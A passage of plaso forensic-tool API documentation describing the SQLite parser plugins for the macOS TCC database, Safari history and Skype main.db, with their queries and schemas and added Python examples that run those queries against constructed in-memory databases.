SCHEMAS = [{'access': 'CREATE TABLE IF NOT EXISTS "access" (\n service TEXT NOT NULL,\n client TEXT NOT NULL,\n client_type INTEGER NOT NULL,\n allowed INTEGER NOT NULL,\n prompt_count INTEGER NOT NULL,\n csreq BLOB,\n policy_id INTEGER,\n indirect_object_identifier_type INTEGER,\n indirect_object_identifier TEXT DEFAULT \'UNUSED\',\n indirect_object_code_identity BLOB,\n flags INTEGER,\n last_modified INTEGER NOT NULL\n DEFAULT (CAST(strftime(\'%s\',\'now\') AS INTEGER)),\n PRIMARY KEY\n (service, client, client_type, indirect_object_identifier),\n FOREIGN KEY (policy_id)\n REFERENCES policies(id) ON DELETE CASCADE ON UPDATE CASCADE);'}]
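The following is an added example (not plaso's own code) that runs the macostcc plugin's documented query against a constructed TCC.db and maps each row to the MacOSTCCEntry fields. It builds the "access" table from the schema listed above (the FOREIGN KEY clause is left out because the referenced policies table is not needed), inserts constructed rows, and checks that the columns the query reads are present before running it; that column check is this example's own, not the plugin's REQUIRED_STRUCTURE. The timestamp is taken from the raw last_modified UNIX epoch value rather than from the query's DATETIME(..., 'LOCALTIME') column, because the latter depends on the time zone of the machine running the analysis. The client_type meaning (0 bundle identifier, 1 absolute path) and the triage heuristic at the end are additions of this example.

```python
"""Added example, not plaso code: exercise the macostcc plugin's query against
a constructed TCC.db and map the rows to the MacOSTCCEntry fields."""
import sqlite3
from datetime import datetime, timezone

# The "access" table as listed in SCHEMAS above, minus the FOREIGN KEY clause
# (the referenced "policies" table is not needed for this example).
ACCESS_SCHEMA = """
CREATE TABLE IF NOT EXISTS "access" (
    service TEXT NOT NULL,
    client TEXT NOT NULL,
    client_type INTEGER NOT NULL,
    allowed INTEGER NOT NULL,
    prompt_count INTEGER NOT NULL,
    csreq BLOB,
    policy_id INTEGER,
    indirect_object_identifier_type INTEGER,
    indirect_object_identifier TEXT DEFAULT 'UNUSED',
    indirect_object_code_identity BLOB,
    flags INTEGER,
    last_modified INTEGER NOT NULL
        DEFAULT (CAST(strftime('%s','now') AS INTEGER)),
    PRIMARY KEY (service, client, client_type, indirect_object_identifier))
"""

# The plugin's query, verbatim from QUERIES above.
PLUGIN_QUERY = (
    "SELECT service, client, allowed, prompt_count, last_modified, "
    "DATETIME(last_modified, 'UNIXEPOCH', 'LOCALTIME') AS timestamp FROM access;")

# Columns the query reads; checked before running it. This is the example's
# own structure check, not the plugin's REQUIRED_STRUCTURE.
QUERY_COLUMNS = frozenset(
    {'service', 'client', 'allowed', 'prompt_count', 'last_modified'})


def table_columns(conn, table):
    """Returns the set of column names of a table via PRAGMA table_info."""
    return {row[1] for row in conn.execute(f'PRAGMA table_info("{table}")')}


def build_sample_db():
    """Builds an in-memory TCC.db with constructed rows (not real data).
    client_type 0 is a bundle identifier, 1 is an absolute path."""
    conn = sqlite3.connect(':memory:')
    conn.row_factory = sqlite3.Row
    conn.execute(ACCESS_SCHEMA)
    rows = [
        # service, client, client_type, allowed, prompt_count, last_modified
        ('kTCCServiceSystemPolicyAllFiles', 'com.example.backupagent',
         0, 1, 1, 1600000000),
        ('kTCCServiceAccessibility', '/usr/local/bin/helper',
         1, 1, 0, 1600003600),
        ('kTCCServiceCamera', 'com.example.chat', 0, 0, 3, 1600007200),
    ]
    conn.executemany(
        'INSERT INTO access (service, client, client_type, allowed, '
        'prompt_count, last_modified) VALUES (?, ?, ?, ?, ?, ?)', rows)
    conn.commit()
    return conn


def parse_tcc_entries(conn):
    """Runs the plugin query and returns one dict per row, typed like
    MacOSTCCEntry. The timestamp comes from the raw last_modified UNIX epoch
    value, so it does not depend on the analysis host's time zone."""
    missing = QUERY_COLUMNS - table_columns(conn, 'access')
    if missing:
        raise ValueError(f'access table lacks columns: {sorted(missing)}')
    entries = []
    for row in conn.execute(PLUGIN_QUERY):
        entries.append({
            'data_type': 'macos:tcc_entry',
            'service': row['service'],
            'client': row['client'],
            'allowed': bool(row['allowed']),
            'prompt_count': row['prompt_count'],
            'last_modified': datetime.fromtimestamp(
                row['last_modified'], tz=timezone.utc),
        })
    return entries


def grants_without_prompt(entries):
    """Triage heuristic: a grant recorded with prompt_count 0 was never
    confirmed through a user prompt (for example it was written by a
    configuration profile or by direct modification of the database)."""
    return [e for e in entries if e['allowed'] and e['prompt_count'] == 0]
```

In the constructed data the Accessibility grant to /usr/local/bin/helper is the only entry flagged by grants_without_prompt; on a real system such entries are the ones to cross-check against MDM profiles and the csreq code requirement before treating them as legitimate.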
plaso.parsers.sqlite_plugins.safari module
SQLite parser plugin for Safari history database files.
class plaso.parsers.sqlite_plugins.safari.SafariHistoryPageVisitedEventData
Bases: plaso.containers.events.EventData
Safari history event data.
host (str): hostname of the server.
title (str): title of the webpage visited.
url (str): URL visited.
visit_count (int): number of times the website was visited.
was_http_non_get (bool): True if the webpage was visited using a non-GET HTTP request.
DATA_TYPE = 'safari:history:visit_sqlite'
class plaso.parsers.sqlite_plugins.safari.SafariHistoryPluginSqlite
Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin
SQLite parser plugin for Safari history database files.
The Safari history database file is typically stored in: /Users/<username>/Library/Safari/History.db
DATA_FORMAT = 'Safari history SQLite database (History.db) file'
NAME = 'safari_historydb'
ParsePageVisitRow(parser_mediator, query, row, **unused_kwargs)
Parses a visited row.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• query (str) – query that created the row.
• row (sqlite3.Row) – row.
QUERIES = [('SELECT history_items.id, history_items.url, history_items.visit_count, history_visits.id AS visit_id, history_visits.history_item,history_visits.visit_time, history_visits.redirect_destination, history_visits.title, history_visits.http_non_get, history_visits.redirect_source FROM history_items, history_visits WHERE history_items.id = history_visits.history_item ORDER BY history_visits.visit_time', 'ParsePageVisitRow')]
REQUIRED_STRUCTURE = {'history_items': frozenset({'id', 'url', 'visit_count'}), 'history_visits': frozenset({'history_item', 'http_non_get', 'id', 'redirect_destination', 'redirect_source', 'title', 'visit_time'})}
SCHEMAS = [{'history_client_versions': 'CREATE TABLE history_client_versions (client_version INTEGER PRIMARY KEY,last_seen REAL NOT NULL)', 'history_event_listeners': 'CREATE TABLE history_event_listeners (listener_name TEXT PRIMARY KEY NOT NULL UNIQUE,last_seen REAL NOT NULL)', 'history_events': 'CREATE TABLE history_events (id INTEGER PRIMARY KEY AUTOINCREMENT,event_type TEXT NOT NULL,event_time REAL NOT NULL,pending_listeners TEXT NOT NULL,value BLOB)', 'history_items': 'CREATE TABLE history_items (id INTEGER PRIMARY KEY AUTOINCREMENT,url TEXT NOT NULL UNIQUE,domain_expansion TEXT NULL,visit_count INTEGER NOT NULL,daily_visit_counts BLOB NOT NULL,weekly_visit_counts BLOB NULL,autocomplete_triggers BLOB NULL,should_recompute_derived_visit_counts INTEGER NOT NULL,visit_count_score INTEGER NOT NULL)', 'history_tombstones': 'CREATE TABLE history_tombstones (id INTEGER PRIMARY KEY AUTOINCREMENT,start_time REAL NOT NULL,end_time REAL NOT NULL,url TEXT,generation INTEGER NOT NULL DEFAULT 0)', 'history_visits': 'CREATE TABLE history_visits (id INTEGER PRIMARY KEY AUTOINCREMENT,history_item INTEGER NOT NULL REFERENCES history_items(id) ON DELETE CASCADE,visit_time REAL NOT NULL,title TEXT NULL,load_successful BOOLEAN NOT NULL DEFAULT 1,http_non_get BOOLEAN NOT NULL DEFAULT 0,synthesized BOOLEAN NOT NULL DEFAULT 0,redirect_source INTEGER NULL UNIQUE REFERENCES history_visits(id) ON DELETE CASCADE,redirect_destination INTEGER NULL UNIQUE REFERENCES history_visits(id) ON DELETE CASCADE,origin INTEGER NOT NULL DEFAULT 0,generation INTEGER NOT NULL DEFAULT 0,attributes INTEGER NOT NULL DEFAULT 0,score INTEGER NOT NULL DEFAULT 0)', 'metadata': 'CREATE TABLE metadata (key TEXT NOT NULL UNIQUE, value)'}]
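The following is an added example (not plaso's own code) that runs the safari_historydb plugin's documented query against a constructed History.db, fills the SafariHistoryPageVisitedEventData fields and then follows the redirect_source/redirect_destination links that the query also returns. The tables are reduced to the columns the query reads (the full definitions are in SCHEMAS above). Treating visit_time as a Cocoa timestamp (seconds since 2001-01-01 UTC) and deriving host from the URL are this example's own choices; the redirect chain reconstruction is an addition that goes beyond what the attribute list above shows.

```python
"""Added example, not plaso code: run the safari_historydb plugin's query
against a constructed History.db, convert visit_time and rebuild redirect
chains."""
import sqlite3
from datetime import datetime, timedelta, timezone
from urllib.parse import urlparse

# Safari stores visit_time as seconds since 2001-01-01 00:00:00 UTC (a Cocoa
# timestamp), not as a UNIX epoch value.
COCOA_EPOCH = datetime(2001, 1, 1, tzinfo=timezone.utc)

# history_items and history_visits reduced to the columns the plugin query
# reads; the full definitions are in SCHEMAS above.
HISTORY_ITEMS = (
    'CREATE TABLE history_items (id INTEGER PRIMARY KEY AUTOINCREMENT, '
    'url TEXT NOT NULL UNIQUE, visit_count INTEGER NOT NULL)')
HISTORY_VISITS = (
    'CREATE TABLE history_visits (id INTEGER PRIMARY KEY AUTOINCREMENT, '
    'history_item INTEGER NOT NULL REFERENCES history_items(id), '
    'visit_time REAL NOT NULL, title TEXT NULL, '
    'http_non_get BOOLEAN NOT NULL DEFAULT 0, '
    'redirect_source INTEGER NULL UNIQUE, '
    'redirect_destination INTEGER NULL UNIQUE)')

# The plugin's query, verbatim from QUERIES above.
PLUGIN_QUERY = (
    'SELECT history_items.id, history_items.url, history_items.visit_count, '
    'history_visits.id AS visit_id, history_visits.history_item,'
    'history_visits.visit_time, history_visits.redirect_destination, '
    'history_visits.title, history_visits.http_non_get, '
    'history_visits.redirect_source FROM history_items, history_visits '
    'WHERE history_items.id = history_visits.history_item '
    'ORDER BY history_visits.visit_time')


def cocoa_to_datetime(seconds):
    return COCOA_EPOCH + timedelta(seconds=seconds)


def build_sample_db():
    """In-memory History.db with constructed rows: a short link redirecting to
    a login page, followed by a form POST to that site."""
    conn = sqlite3.connect(':memory:')
    conn.row_factory = sqlite3.Row
    conn.execute(HISTORY_ITEMS)
    conn.execute(HISTORY_VISITS)
    conn.executemany('INSERT INTO history_items VALUES (?, ?, ?)', [
        (1, 'http://short.example/x', 1),
        (2, 'https://login.example.com/', 1),
        (3, 'https://login.example.com/submit', 1),
    ])
    # (id, history_item, visit_time, title, http_non_get,
    #  redirect_source, redirect_destination)
    conn.executemany('INSERT INTO history_visits VALUES (?, ?, ?, ?, ?, ?, ?)', [
        (10, 1, 600000000.0, None, 0, None, 11),
        (11, 2, 600000000.5, 'Sign in', 0, 10, None),
        (12, 3, 600000042.0, 'Welcome', 1, None, None),
    ])
    conn.commit()
    return conn


def parse_page_visits(conn):
    """Runs the plugin query and returns one dict per visit holding the
    SafariHistoryPageVisitedEventData fields plus the redirect links."""
    events = []
    for row in conn.execute(PLUGIN_QUERY):
        events.append({
            'data_type': 'safari:history:visit_sqlite',
            'visit_id': row['visit_id'],
            'timestamp': cocoa_to_datetime(row['visit_time']),
            'url': row['url'],
            'host': urlparse(row['url']).hostname or '',
            'title': row['title'],
            'visit_count': row['visit_count'],
            'was_http_non_get': bool(row['http_non_get']),
            'redirect_source': row['redirect_source'],
            'redirect_destination': row['redirect_destination'],
        })
    return events


def redirect_chains(events):
    """Follows redirect_destination links from each chain head; the seen-set
    guards against a malformed database containing a redirect loop."""
    by_id = {e['visit_id']: e for e in events}
    chains = []
    for event in events:
        if event['redirect_source'] is not None:
            continue  # not the head of a chain
        chain, seen = [event['url']], {event['visit_id']}
        next_id = event['redirect_destination']
        while next_id in by_id and next_id not in seen:
            seen.add(next_id)
            chain.append(by_id[next_id]['url'])
            next_id = by_id[next_id]['redirect_destination']
        if len(chain) > 1:
            chains.append(chain)
    return chains
```

With the constructed rows, parse_page_visits returns the three visits in visit_time order, the last one flagged as a non-GET request, and redirect_chains recovers the short link to login page hop; the redirect pair in a real History.db is what distinguishes a page the user typed from one they were sent to.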
plaso.parsers.sqlite_plugins.skype module
SQLite parser plugin for Skype database files.
class plaso.parsers.sqlite_plugins.skype.SkypeAccountEventData
Bases: plaso.containers.events.EventData
Skype account event data.
country (str): home country of the account holder.
display_name (str): display name of the account holder.
email (str): registered email address of the account holder.
username (str): full name of the Skype account holder and display name.
DATA_TYPE = 'skype:event:account'
class plaso.parsers.sqlite_plugins.skype.SkypeCallEventData
Bases: plaso.containers.events.EventData
Skype call event data.
call_type (str): call type, such as: WAITING, STARTED, FINISHED.
dst_call (str): account which received the call.
src_call (str): account which started the call.
user_start_call (bool): True if the owner account started the call.
video_conference (bool): True if the call was a video conference.
DATA_TYPE = 'skype:event:call'
class plaso.parsers.sqlite_plugins.skype.SkypeChatEventData
Bases: plaso.containers.events.EventData
Skype chat event data.
from_account (str): from display name and the author.
text (str): body XML.
title (str): title.
to_account (str): accounts, excluding the author, of the conversation.
DATA_TYPE = 'skype:event:chat'
class plaso.parsers.sqlite_plugins.skype.SkypePlugin
Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin
SQLite parser plugin for Skype database files.
DATA_FORMAT = 'Skype SQLite database (main.db) file'
NAME = 'skype'
ParseAccountInformation(parser_mediator, query, row, **unused_kwargs)
Parses account information.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• query (str) – query that created the row.
• row (sqlite3.Row) – row with account information.
ParseCall(parser_mediator, query, row, **unused_kwargs)
Parses a call.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• query (str) – query that created the row.
• row (sqlite3.Row) – row resulting from query.
ParseChat(parser_mediator, query, row, **unused_kwargs)
Parses a chat message.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• query (str) – query that created the row.
• row (sqlite3.Row) – row resulting from query.
ParseFileTransfer(parser_mediator, query, row, cache=None, database=None, **unused_kwargs)
Parses a file transfer.
There is no direct relationship between who sends the file and who accepts the file. The source and destination accounts are therefore looked up separately, through the QUERY_SOURCE_FROM_TRANSFER (keyed on pk_id) and QUERY_DEST_FROM_TRANSFER (keyed on parent_id) queries, and the results of those lookups are kept in the cache.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• query (str) – query that created the row.
• row (sqlite3.Row) – row resulting from query.
• cache (Optional[SQLiteCache]) – cache.
• database (Optional[SQLiteDatabase]) – database.
ParseSMS(parser_mediator, query, row, **unused_kwargs)
Parses an SMS.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• query (str) – query that created the row.
• row (sqlite3.Row) – row resulting from query.
QUERIES = [('SELECT c.id, c.participants, c.friendlyname AS title, m.author AS author, m.from_dispname AS from_displayname, m.body_xml, m.timestamp, c.dialog_partner FROM Chats c, Messages m WHERE c.name = m.chatname', 'ParseChat'), ('SELECT id, fullname, given_displayname, emails, country, profile_timestamp, authreq_timestamp, lastonline_timestamp, mood_timestamp, sent_authrequest_time, lastused_timestamp FROM Accounts', 'ParseAccountInformation'), ('SELECT id, target_numbers AS dstnum_sms, timestamp AS time_sms, body AS msg_sms FROM SMSes', 'ParseSMS'), ('SELECT id, partner_handle, partner_dispname, offer_send_list, starttime, accepttime, finishtime, filepath, filename, filesize, status, parent_id, pk_id FROM Transfers', 'ParseFileTransfer'), ('SELECT c.id, cm.guid, c.is_incoming, cm.call_db_id, cm.videostatus, c.begin_timestamp AS try_call, cm.start_timestamp AS accept_call, cm.call_duration FROM Calls c, CallMembers cm WHERE c.id = cm.call_db_id;', 'ParseCall')]
QUERY_DEST_FROM_TRANSFER = 'SELECT parent_id, partner_handle AS skypeid, partner_dispname AS skypename FROM transfers'
QUERY_SOURCE_FROM_TRANSFER = 'SELECT pk_id, partner_handle AS skypeid, partner_dispname AS skypename FROM transfers'
REQUIRED_STRUCTURE = {'Accounts': frozenset({'authreq_timestamp', 'country', 'emails', 'fullname', 'given_displayname', 'id', 'lastonline_timestamp', 'mood_timestamp', 'profile_timestamp', 'sent_authrequest_time'}), 'CallMembers': frozenset({'call_db_id', 'call_duration', 'guid', 'start_timestamp', 'videostatus'}), 'Calls': frozenset({'begin_timestamp', 'id', 'is_incoming'}), 'Chats': frozenset({'dialog_partner', 'friendlyname', 'id', 'name', 'participants'}), 'Messages': frozenset({'author', 'body_xml', 'chatname', 'from_dispname', 'timestamp'}), 'SMSes': frozenset({'body', 'id', 'target_numbers', 'timestamp'}), 'Transfers': frozenset({'accepttime', 'filename', 'filepath', 'filesize', 'finishtime', 'id', 'offer_send_list', 'parent_id', 'partner_dispname', 'partner_handle', 'pk_id', 'starttime', 'status'})}
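The following is an added example (not plaso's own code) that runs the chat query from QUERIES above against a constructed Skype main.db and derives the SkypeChatEventData fields from the joined Chats and Messages rows. The Chats and Messages tables are reduced to the columns that query reads (the full definitions are in SCHEMAS). Two things are this example's own choices rather than statements about the plugin: the participants column is treated as a space-separated list of account names, with to_account built from every participant except the author and dialog_partner used as a fallback when that list is empty, and message timestamps are treated as UNIX epoch seconds.

```python
"""Added example, not plaso code: run the skype plugin's chat query against a
constructed main.db and derive from_account/to_account as in
SkypeChatEventData."""
import sqlite3
from datetime import datetime, timezone

# Chats and Messages reduced to the columns the chat query reads; the full
# definitions are in SCHEMAS above.
CHATS_SCHEMA = (
    'CREATE TABLE Chats (id INTEGER NOT NULL PRIMARY KEY, name TEXT, '
    'friendlyname TEXT, timestamp INTEGER, dialog_partner TEXT, '
    'participants TEXT)')
MESSAGES_SCHEMA = (
    'CREATE TABLE Messages (id INTEGER NOT NULL PRIMARY KEY, chatname TEXT, '
    'author TEXT, from_dispname TEXT, timestamp INTEGER, body_xml TEXT)')

# The chat query, verbatim from QUERIES above.
CHAT_QUERY = (
    'SELECT c.id, c.participants, c.friendlyname AS title, m.author AS author, '
    'm.from_dispname AS from_displayname, m.body_xml, m.timestamp, '
    'c.dialog_partner FROM Chats c, Messages m WHERE c.name = m.chatname')


def build_sample_db():
    """In-memory main.db with constructed rows: one group chat and one
    one-to-one chat. participants is assumed to be a space-separated list."""
    conn = sqlite3.connect(':memory:')
    conn.row_factory = sqlite3.Row
    conn.execute(CHATS_SCHEMA)
    conn.execute(MESSAGES_SCHEMA)
    conn.executemany('INSERT INTO Chats VALUES (?, ?, ?, ?, ?, ?)', [
        (1, '#alice/$group;abc', 'Project X', 1600000000, None,
         'alice bob carol'),
        (2, '#alice/$bob;def', None, 1600001000, 'bob', 'alice bob'),
    ])
    conn.executemany('INSERT INTO Messages VALUES (?, ?, ?, ?, ?, ?)', [
        (1, '#alice/$group;abc', 'alice', 'Alice A.', 1600000000,
         'meet at 10'),
        (2, '#alice/$group;abc', 'carol', 'Carol C.', 1600000060,
         '<a href="https://files.example/x">report</a>'),
        (3, '#alice/$bob;def', 'bob', 'Bob B.', 1600001000,
         'can you send the VPN config?'),
    ])
    conn.commit()
    return conn


def parse_chat_messages(conn):
    """Runs the chat query and returns events sorted by timestamp (the query
    itself has no ORDER BY). to_account lists the chat participants other
    than the author, falling back to dialog_partner when the participants
    column is empty. Skype timestamps are UNIX epoch seconds."""
    events = []
    for row in conn.execute(CHAT_QUERY):
        author = row['author'] or ''
        participants = (row['participants'] or '').split()
        to_account = ', '.join(p for p in participants if p != author)
        if not to_account:
            to_account = row['dialog_partner'] or ''
        events.append({
            'data_type': 'skype:event:chat',
            'timestamp': datetime.fromtimestamp(row['timestamp'], tz=timezone.utc),
            'title': row['title'],
            'from_account': f"{row['from_displayname']} <{author}>",
            'to_account': to_account,
            'text': row['body_xml'],
        })
    events.sort(key=lambda e: e['timestamp'])
    return events
```

Because the join is on Chats.name = Messages.chatname rather than on a numeric key, a message whose chatname has no matching Chats row is silently dropped by this query; when the count of Messages rows and the count of chat events differ, that is the first thing to check.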
SCHEMAS = [{'Accounts': 'CREATE TABLE Accounts (id INTEGER NOT NULL PRIMARY KEY, is_permanent INTEGER, status INTEGER, pwdchangestatus INTEGER, logoutreason INTEGER, commitstatus INTEGER, suggested_skypename TEXT, skypeout_balance_currency TEXT, skypeout_balance INTEGER, skypeout_precision INTEGER, skypein_numbers TEXT, subscriptions TEXT, cblsyncstatus INTEGER, offline_callforward TEXT, chat_policy INTEGER, skype_call_policy INTEGER, pstn_call_policy INTEGER, avatar_policy INTEGER, buddycount_policy INTEGER, timezone_policy INTEGER, webpresence_policy INTEGER, phonenumbers_policy INTEGER, voicemail_policy INTEGER, authrequest_policy INTEGER, ad_policy INTEGER, partner_optedout TEXT, service_provider_info TEXT, registration_timestamp INTEGER, nr_of_other_instances INTEGER, partner_channel_status TEXT, flamingo_xmpp_status INTEGER, federated_presence_policy INTEGER, liveid_membername TEXT, roaming_history_enabled INTEGER, cobrand_id INTEGER, owner_under_legal_age INTEGER, type INTEGER, skypename TEXT, pstnnumber TEXT, fullname TEXT, birthday INTEGER, gender INTEGER, languages TEXT, country TEXT, province TEXT, city TEXT, phone_home TEXT, phone_office TEXT, phone_mobile TEXT, emails TEXT, homepage TEXT, about TEXT, profile_timestamp INTEGER, received_authrequest TEXT, displayname TEXT, refreshing INTEGER, given_authlevel INTEGER, aliases TEXT, authreq_timestamp INTEGER, mood_text TEXT, timezone INTEGER, nrof_authed_buddies INTEGER, ipcountry TEXT, given_displayname TEXT, availability INTEGER, lastonline_timestamp INTEGER, capabilities BLOB, avatar_image BLOB, assigned_speeddial TEXT, lastused_timestamp INTEGER, authrequest_count INTEGER, assigned_comment TEXT, alertstring TEXT, avatar_timestamp INTEGER, mood_timestamp INTEGER, rich_mood_text TEXT, synced_email BLOB, set_availability INTEGER, options_change_future BLOB, cbl_profile_blob BLOB, authorized_time INTEGER, sent_authrequest TEXT, sent_authrequest_time INTEGER, sent_authrequest_serial INTEGER, buddyblob BLOB, 
cbl_future BLOB, node_capabilities INTEGER, node_capabilities_and INTEGER, revoked_auth INTEGER, added_in_shared_group INTEGER, in_shared_group INTEGER, authreq_history BLOB, profile_attachments BLOB, stack_version INTEGER, offline_authreq_id INTEGER, verified_email BLOB, verified_company BLOB, uses_jcs INTEGER)', 'Alerts': 'CREATE TABLE Alerts (id INTEGER NOT NULL PRIMARY KEY, is_permanent INTEGER, timestamp INTEGER, partner_name TEXT, is_unseen INTEGER, partner_id INTEGER, partner_event TEXT, partner_history TEXT, partner_header TEXT, partner_logo TEXT, meta_expiry INTEGER, message_header_caption TEXT, message_header_title TEXT, message_header_subject TEXT, message_header_cancel TEXT, message_header_later TEXT, message_content TEXT, message_footer TEXT, message_button_caption TEXT, message_button_uri TEXT, message_type INTEGER, window_size INTEGER, chatmsg_guid BLOB, notification_id INTEGER, event_flags INTEGER, extprop_hide_from_history INTEGER)', 'AppSchemaVersion': 'CREATE TABLE AppSchemaVersion (ClientVersion TEXT NOT NULL, SQLiteSchemaVersion INTEGER NOT NULL, SchemaUpdateType INTEGER NOT NULL)', 'CallMembers': 'CREATE TABLE CallMembers (id INTEGER NOT NULL PRIMARY KEY, is_permanent INTEGER, identity TEXT, dispname TEXT, languages TEXT, call_duration INTEGER, price_per_minute INTEGER, price_precision INTEGER, price_currency TEXT, payment_category TEXT, type INTEGER, status INTEGER, failurereason INTEGER, sounderror_code INTEGER, soundlevel INTEGER, pstn_statustext TEXT, pstn_feedback TEXT, forward_targets TEXT, forwarded_by TEXT, debuginfo TEXT, videostatus INTEGER, target_identity TEXT, mike_status INTEGER, is_read_only INTEGER, quality_status INTEGER, call_name TEXT, transfer_status INTEGER, transfer_active INTEGER, transferred_by TEXT, transferred_to TEXT, guid TEXT, next_redial_time INTEGER, nrof_redials_done INTEGER, nrof_redials_left INTEGER, transfer_topic TEXT, real_identity TEXT, start_timestamp INTEGER, is_conference INTEGER, quality_problems TEXT, 
identity_type INTEGER, country TEXT, creation_timestamp INTEGER, stats_xml TEXT, is_premium_video_sponsor INTEGER, is_multiparty_video_capable INTEGER, recovery_in_progress INTEGER, nonse_word TEXT, nr_of_delivered_push_notifications INTEGER, call_session_guid TEXT, version_string TEXT, pk_status INTEGER, call_db_id INTEGER, prime_status INTEGER)', 'Calls': 'CREATE TABLE Calls (id INTEGER NOT NULL PRIMARY KEY, is_permanent INTEGER, begin_timestamp INTEGER, topic TEXT, is_muted INTEGER, is_unseen_missed INTEGER, host_identity TEXT, mike_status INTEGER, duration INTEGER, soundlevel INTEGER, access_token TEXT, active_members INTEGER, is_active INTEGER, name TEXT, video_disabled INTEGER, joined_existing INTEGER, server_identity TEXT, vaa_input_status INTEGER, is_incoming INTEGER, is_conference INTEGER, is_on_hold INTEGER, start_timestamp INTEGER, quality_problems TEXT, current_video_audience TEXT, premium_video_status INTEGER, premium_video_is_grace_period INTEGER, is_premium_video_sponsor INTEGER, premium_video_sponsor_list TEXT, old_members BLOB, partner_handle TEXT, partner_dispname TEXT, type INTEGER, status INTEGER, failurereason INTEGER, failurecode INTEGER, pstn_number TEXT, old_duration INTEGER, conf_participants BLOB, pstn_status TEXT, members BLOB, conv_dbid INTEGER)', 'ChatMembers': 'CREATE TABLE ChatMembers (id INTEGER NOT NULL PRIMARY KEY, is_permanent INTEGER, chatname TEXT, identity TEXT, role INTEGER, is_active INTEGER, cur_activities INTEGER, adder TEXT)', 'Chats': 'CREATE TABLE Chats (id INTEGER NOT NULL PRIMARY KEY, is_permanent INTEGER, name TEXT, options INTEGER, friendlyname TEXT, description TEXT, timestamp INTEGER, activity_timestamp INTEGER, dialog_partner TEXT, adder TEXT, type INTEGER, mystatus INTEGER, myrole INTEGER, posters TEXT, participants TEXT, applicants TEXT, banned_users TEXT, name_text TEXT, topic TEXT, topic_xml TEXT, guidelines TEXT, picture BLOB, alertstring TEXT, is_bookmarked INTEGER, passwordhint TEXT, 
unconsumed_suppressed_msg INTEGER, unconsumed_normal_msg INTEGER, unconsumed_elevated_msg INTEGER, unconsumed_msg_voice INTEGER, activemembers TEXT, state_data BLOB, lifesigns INTEGER, last_change INTEGER, first_unread_message INTEGER, pk_type INTEGER, dbpath TEXT, split_friendlyname TEXT, conv_dbid INTEGER)', 'ContactGroups': 'CREATE TABLE ContactGroups (id INTEGER NOT NULL PRIMARY KEY, is_permanent INTEGER, type INTEGER, custom_group_id INTEGER, given_displayname TEXT, nrofcontacts INTEGER, nrofcontacts_online INTEGER, given_sortorder INTEGER, type_old INTEGER, proposer TEXT, description TEXT, associated_chat TEXT, members TEXT, cbl_id INTEGER, cbl_blob BLOB, fixed INTEGER, keep_sharedgroup_contacts INTEGER, chats TEXT, extprop_is_hidden INTEGER, extprop_sortorder_value INTEGER, extprop_is_expanded INTEGER)', 'Contacts': 'CREATE TABLE Contacts (id INTEGER NOT NULL PRIMARY KEY, is_permanent INTEGER, type INTEGER, skypename TEXT, pstnnumber TEXT, aliases TEXT, fullname TEXT, birthday INTEGER, gender INTEGER, languages TEXT, country TEXT, province TEXT, city TEXT, phone_home TEXT, phone_office TEXT, phone_mobile TEXT, emails TEXT, hashed_emails TEXT, homepage TEXT, about TEXT, avatar_image BLOB, mood_text TEXT, rich_mood_text TEXT, timezone INTEGER, capabilities BLOB, profile_timestamp INTEGER, nrof_authed_buddies INTEGER, ipcountry TEXT, avatar_timestamp INTEGER, mood_timestamp INTEGER, received_authrequest TEXT, authreq_timestamp INTEGER, lastonline_timestamp INTEGER, availability INTEGER, displayname TEXT, refreshing INTEGER, given_authlevel INTEGER, given_displayname TEXT, assigned_speeddial TEXT, assigned_comment TEXT, alertstring TEXT, lastused_timestamp INTEGER, authrequest_count INTEGER, assigned_phone1 TEXT, assigned_phone1_label TEXT, assigned_phone2 TEXT, assigned_phone2_label TEXT, assigned_phone3 TEXT, assigned_phone3_label TEXT, buddystatus INTEGER, isauthorized INTEGER, popularity_ord INTEGER, external_id TEXT, external_system_id TEXT, isblocked 
INTEGER, authorization_certificate BLOB, certificate_send_count INTEGER, account_modification_serial_nr INTEGER, saved_directory_blob BLOB, nr_of_buddies INTEGER, server_synced INTEGER, contactlist_track INTEGER, last_used_networktime INTEGER, authorized_time INTEGER, sent_authrequest TEXT, sent_authrequest_time INTEGER, sent_authrequest_serial INTEGER, buddyblob BLOB, cbl_future BLOB, node_capabilities INTEGER, revoked_auth INTEGER, added_in_shared_group INTEGER, in_shared_group INTEGER, authreq_history BLOB, profile_attachments BLOB, stack_version INTEGER, offline_authreq_id INTEGER, node_capabilities_and INTEGER, authreq_crc INTEGER, authreq_src INTEGER, pop_score INTEGER, authreq_nodeinfo BLOB, main_phone TEXT, unified_servants TEXT, phone_home_normalized TEXT, phone_office_normalized TEXT, phone_mobile_normalized TEXT, sent_authrequest_initmethod INTEGER, authreq_initmethod INTEGER, verified_email BLOB, verified_company BLOB, sent_authrequest_extrasbitmask INTEGER, liveid_cid TEXT, extprop_seen_birthday INTEGER, extprop_sms_target INTEGER, extprop_external_data TEXT, extprop_must_hide_avatar INTEGER)', 'Conversations': 'CREATE TABLE Conversations (id INTEGER NOT NULL PRIMARY KEY, is_permanent INTEGER, identity TEXT, type INTEGER, live_host TEXT, live_start_timestamp INTEGER, live_is_muted INTEGER, alert_string TEXT, is_bookmarked INTEGER, given_displayname TEXT, displayname TEXT, local_livestatus INTEGER, inbox_timestamp INTEGER, inbox_message_id INTEGER, unconsumed_suppressed_messages INTEGER, unconsumed_normal_messages INTEGER, unconsumed_elevated_messages INTEGER, unconsumed_messages_voice INTEGER, active_vm_id INTEGER, context_horizon INTEGER, consumption_horizon INTEGER, last_activity_timestamp INTEGER, active_invoice_message INTEGER, spawned_from_convo_id INTEGER, pinned_order INTEGER, creator TEXT, creation_timestamp INTEGER, my_status INTEGER, opt_joining_enabled INTEGER, opt_access_token TEXT, opt_entry_level_rank INTEGER, opt_disclose_history 
